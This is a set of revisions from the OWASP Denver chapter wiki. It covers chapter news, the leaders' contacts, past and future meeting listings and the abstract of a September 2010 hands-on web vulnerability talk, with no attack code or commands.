* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf<br />
* <br />
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf<br />
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf<br />
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf<br />
* <br />
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories<br />
* http://www.owasp.org/index.php/Man_vs._Code<br />
* <br />
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf<br />
* <br />
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf<br />
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf<br />
<br />
=====Chapter Management Links=====<br />
[[Pizza|Best pizza in Centennial]]<br />
__NOTOC__<br />
<headertabs/><br />
[[Category:OWASP Chapter]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver&diff=89314Denver2010-09-15T01:16:11Z<p>Eduprey: </p>
<hr />
<div>{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell]. |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}<br />
<br />
==== Local News ====<br />
<br />
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====<br />
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]<br />
<br />
Next Denver meeting is scheduled for Wed, 18 Aug 2010 at an all new central Denver location. We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our August meeting much closer to downtown, but with free parking!<br />
<br />
<!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
=====Front Range OWASP Conference (FROC 2010) =====<br />
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support. The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.<br />
<br />
<br />
<br />
=====OWASP Podcast=====<br />
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]<br />
<br />
<br />
<paypal>Denver</paypal><br />
<hr><br />
<br />
==Questions, Comments==<br />
Questions can be directed to <br />
<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
<hr><br />
<br />
<br />
==== Chapter Meetings ====<br />
<br />
== Future Meetings == <br />
<!-- TBD<br />
<br />
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]<br />
<br />
== Past Meetings ==<br />
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]<br />
<br />
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]<br />
<br />
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]<br />
<br />
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]<br />
<br />
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]<br />
<br />
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb & and Daniel Weiske: Compliance and application security testing]]<br />
<br />
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]<br />
<br />
[[Denver January 2009 meeting|January 2009: David Campbell & Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]<br />
<br />
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]<br />
<br />
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]<br />
<br />
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]<br />
<br />
[[Denver July 2008 meeting|July 2008: David Byrne & Eric Duprey: Grendel-Scan]]<br />
<br />
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]<br />
<br />
[[Denver May 2008 meeting|May 2008: David Campbell & Eric Duprey: XSS Attacks & Defenses]]<br />
<br />
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]<br />
<br />
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]<br />
<br />
[[Denver June 2007 meeting|June 2007]]<br />
<br />
[[Denver April 2007 meeting|April 2007]]<br />
<br />
[[Denver February 2007 meeting|February 2007]]<br />
<br />
[[Denver January 2007 meeting|January 2007]]<br />
<br />
[[Denver November 2006 meeting|November 2006]]<br />
<br />
==[[Related_Organizations|Local Organizations of Interest]]==<br />
<br />
==== Mailing List ====<br />
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email<br />
<br />
==== Twitter Feed @owasp303 ====<br />
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop. Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.<br />
<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|}<br />
<br />
<br />
<br />
====Resources====<br />
<br />
=====Denver OWASP Chapter Leaders=====<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
=====Key OWASP Resources=====<br />
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf<br />
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf<br />
* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf<br />
* <br />
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf<br />
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf<br />
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf<br />
* <br />
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories<br />
* http://www.owasp.org/index.php/Man_vs._Code<br />
* <br />
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf<br />
* <br />
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf<br />
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf<br />
<br />
=====Chapter Management Links=====<br />
[[Pizza|Best pizza in Centennial]]<br />
__NOTOC__<br />
<headertabs/><br />
[[Category:OWASP Chapter]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89313Denver September 2010 meeting2010-09-15T01:15:26Z<p>Eduprey: </p>
<hr />
<div>== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code. Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89204Denver September 2010 meeting2010-09-13T17:08:14Z<p>Eduprey: </p>
<hr />
<div>== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code. Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver&diff=89113Denver2010-09-12T04:44:21Z<p>Eduprey: </p>
<hr />
<div>{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell]. |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}<br />
<br />
==== Local News ====<br />
<br />
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====<br />
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]<br />
<br />
Next Denver meeting is scheduled for Wed, 18 Aug 2010 at an all new central Denver location. We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our August meeting much closer to downtown, but with free parking!<br />
<br />
<!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
=====Front Range OWASP Conference (FROC 2010) =====<br />
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support. The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.<br />
<br />
<br />
<br />
=====OWASP Podcast=====<br />
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]<br />
<br />
<br />
<paypal>Denver</paypal><br />
<hr><br />
<br />
==Questions, Comments==<br />
Questions can be directed to <br />
<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
<hr><br />
<br />
<br />
==== Chapter Meetings ====<br />
<br />
== Future Meetings == <br />
<!-- TBD<br />
<br />
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF. We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).<br />
<br />
We are also looking at doing a static analysis working group. Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.<br />
<br />
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.<br />
<br />
Interested? Let us know. Tweet with hashtag #owasp303 or email us at froc@owasp.org. --><br />
<br />
[[Denver September 2010 meeting|September 29th 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]<br />
<br />
== Past Meetings ==<br />
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]<br />
<br />
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]<br />
<br />
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]<br />
<br />
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]<br />
<br />
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]<br />
<br />
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb & and Daniel Weiske: Compliance and application security testing]]<br />
<br />
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]<br />
<br />
[[Denver January 2009 meeting|January 2009: David Campbell & Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]<br />
<br />
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]<br />
<br />
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]<br />
<br />
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]<br />
<br />
[[Denver July 2008 meeting|July 2008: David Byrne & Eric Duprey: Grendel-Scan]]<br />
<br />
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]<br />
<br />
[[Denver May 2008 meeting|May 2008: David Campbell & Eric Duprey: XSS Attacks & Defenses]]<br />
<br />
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]<br />
<br />
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]<br />
<br />
[[Denver June 2007 meeting|June 2007]]<br />
<br />
[[Denver April 2007 meeting|April 2007]]<br />
<br />
[[Denver February 2007 meeting|February 2007]]<br />
<br />
[[Denver January 2007 meeting|January 2007]]<br />
<br />
[[Denver November 2006 meeting|November 2006]]<br />
<br />
==[[Related_Organizations|Local Organizations of Interest]]==<br />
<br />
==== Mailing List ====<br />
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email<br />
<br />
==== Twitter Feed @owasp303 ====<br />
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop. Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.<br />
<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|}<br />
<br />
<br />
<br />
====Resources====<br />
<br />
=====Denver OWASP Chapter Leaders=====<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
=====Key OWASP Resources=====<br />
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf<br />
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf<br />
* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf<br />
* <br />
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf<br />
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf<br />
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf<br />
* <br />
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories<br />
* http://www.owasp.org/index.php/Man_vs._Code<br />
* <br />
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf<br />
* <br />
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf<br />
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf<br />
<br />
=====Chapter Management Links=====<br />
[[Pizza|Best pizza in Centennial]]<br />
__NOTOC__<br />
<headertabs/><br />
[[Category:OWASP Chapter]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89112Denver September 2010 meeting2010-09-12T02:42:18Z<p>Eduprey: added creds stuff :)</p>
<hr />
<div>== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code. Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, courtesy of [http://hosting.com/ Hosting.com]<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89111Denver September 2010 meeting2010-09-12T02:40:07Z<p>Eduprey: </p>
<hr />
<div>== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, courtesy of [http://hosting.com/ Hosting.com]<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89110Denver September 2010 meeting2010-09-12T02:38:22Z<p>Eduprey: </p>
<hr />
<div>== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, courtesy of [http://hosting.com/ Hosting.com]<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89109Denver September 2010 meeting2010-09-12T02:27:43Z<p>Eduprey: grammatical fix</p>
<hr />
<div>== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, courtesy of [http://hosting.com/ Hosting.com]<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&diff=89108Denver September 2010 meeting2010-09-12T02:20:27Z<p>Eduprey: created</p>
<hr />
<div>== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&source=s_q&hl=en&q=hosting.com&sll=39.699262,-104.986725&sspn=0.159814,0.258522&ie=UTF8&radius=8.24&split=1&rq=1&ev=zi&hq=hosting.com&hnear=&ll=39.699262,-104.986725&spn=0.159814,0.258522&z=12&iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==<br />
<br />
=== Eric Duprey: "Application Vulnerability Shooting Gallery" ===<br />
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''<br />
<br />
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged. Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high. One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.<br />
<br />
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications. It will cover discovering vulnerabilities, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.<br />
<br />
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)<br />
<br />
Presenter: '''Eric Duprey'''<br />
<br />
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter. For several years, Eric has been performing application security assessments, penetration testing and source code for major enterprise companies and working with application developers to remediate vulnerable code.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop, courtesy of [http://hosting.com/ Hosting.com]<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
